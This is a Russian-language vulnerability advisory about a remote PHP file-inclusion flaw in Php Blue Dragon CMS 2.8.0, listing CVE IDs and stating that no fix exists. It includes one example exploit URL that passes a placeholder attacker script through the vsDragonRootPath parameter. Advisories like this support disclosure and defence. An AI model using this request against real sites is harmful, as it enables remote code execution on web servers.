PHP-инклюдинг в Php Blue Dragon CMS

Дата публикации:
17.05.2006
Дата изменения:
17.10.2006
Всего просмотров:
2548
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-3076
CVE-2006-2392
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Php Blue Dragon CMS 2.x
Уязвимые версии: Php Blue Dragon CMS 2.8.0, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "vsDragonRootPath" в сценарии public_includes/pub_popup/popup_finduser.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://www.site.com/[dragon_path]/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=[evil_scripts]

URL производителя: blue-dragon.php.pl

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Php Blue Dragon Platinum - Remote File Include

или введите имя

CAPTCHA